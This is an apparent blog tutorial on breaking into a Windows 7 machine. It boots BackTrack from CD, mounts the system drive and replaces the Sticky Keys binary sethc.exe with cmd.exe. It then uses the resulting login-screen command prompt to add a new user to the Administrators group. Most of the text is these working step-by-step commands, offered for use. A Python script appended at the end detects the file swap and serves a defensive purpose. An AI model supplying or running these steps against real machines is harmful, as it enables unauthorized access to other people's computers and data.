Hacking Windows 7 username and password using BackTrack
Windows Hacking
Here we'll learn how to break an Administrator's password or to create an account without knowing the Administrator password.
We need a BackTrack CD. What we'll do here is replace the Sticky Keys file "sethc.exe" with a copy of "cmd.exe", so that pressing the Shift key 5 times on the login screen brings up the command prompt. Once the command prompt is displayed we can create a user from the command line and give that user Administrator rights.
Steps:
1. Insert the CD in the CD-ROM drive and live-boot the system into the BackTrack OS. Select CD/DVD as the boot priority by pressing F12.
After the machine boots, if it asks you for a login, use:
Username = root
Password = toor
Type "startx" to change from the CLI to the GUI.
2. Once you are in the GUI, open a terminal and type:
#fdisk -l
(To list the disks and partitions)
3. #mkdir /mnt/cdrive
(To make a directory to mount the C drive on; you can use any name here, it is just a folder name)
4. #mount -t ntfs /dev/sda2 /mnt/cdrive
(Mount the C drive, i.e. /dev/sda2, on the cdrive folder)
5. #cd /mnt/cdrive
(To change into the mounted directory)
6. #cd Windows/System32
(To open the System32 folder)
7. #ls -l
(To get the list of the files in the System32 folder)
8. #cp sethc.exe sethcbk.up
(To take a backup of the sethc.exe file)
9. #cp cmd.exe sethc.exe
(To overwrite sethc.exe with a copy of cmd.exe)
10. Now restart the system:
#init 6
(or #reboot)
You can eject the CD now.
Now you have the Windows login screen in front of you.
11. Press the Shift key 5 times.
It will show you the command prompt. Now create the user.
12. >net user username password /add
e.g. >net user abc 12345678 /add
Now that you have the user, you need to give it Administrator rights.
13. >net localgroup Administrators /add username
e.g. >net localgroup Administrators /add abc
Restart the system now and log in with the new user!!
You will notice that you have administrative rights now. AWESOME !!!
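Seen from the defender's side, the file changes made in steps 8 and 9 leave two artifacts that can be checked on a mounted volume: a sethc.exe that is byte-identical to cmd.exe, and the sethcbk.up backup. The check below is an added example, not part of the original post; the function names and the sample directory it builds are assumptions made for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def find_ci(directory, name):
    """Case-insensitive lookup; an NTFS volume mounted on Linux keeps name case."""
    for entry in Path(directory).iterdir():
        if entry.is_file() and entry.name.lower() == name.lower():
            return entry
    return None

def check_sticky_keys(system32):
    """Return findings that indicate sethc.exe was swapped as the post describes."""
    findings = []
    sethc = find_ci(system32, "sethc.exe")
    cmd = find_ci(system32, "cmd.exe")
    if sethc is None:
        findings.append("sethc.exe is missing")
    elif cmd is not None and sha256(sethc) == sha256(cmd):
        findings.append("sethc.exe is byte-identical to cmd.exe")
    if find_ci(system32, "sethcbk.up") is not None:
        findings.append("backup copy sethcbk.up is present")
    return findings

def make_sample(root, tampered):
    """Build a constructed System32 stand-in (placeholder bytes, not real binaries)."""
    system32 = Path(root) / "Windows" / "System32"
    system32.mkdir(parents=True)
    cmd_bytes = b"constructed cmd placeholder"
    sethc_bytes = b"constructed sethc placeholder"
    (system32 / "cmd.exe").write_bytes(cmd_bytes)
    (system32 / "sethc.exe").write_bytes(cmd_bytes if tampered else sethc_bytes)
    if tampered:
        (system32 / "sethcbk.up").write_bytes(sethc_bytes)
    return system32

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as changed:
        print("clean:  ", check_sticky_keys(make_sample(clean, tampered=False)))
        print("changed:", check_sticky_keys(make_sample(changed, tampered=True)))
```

On a real volume, point check_sticky_keys at the mounted Windows/System32 directory instead of the constructed sample.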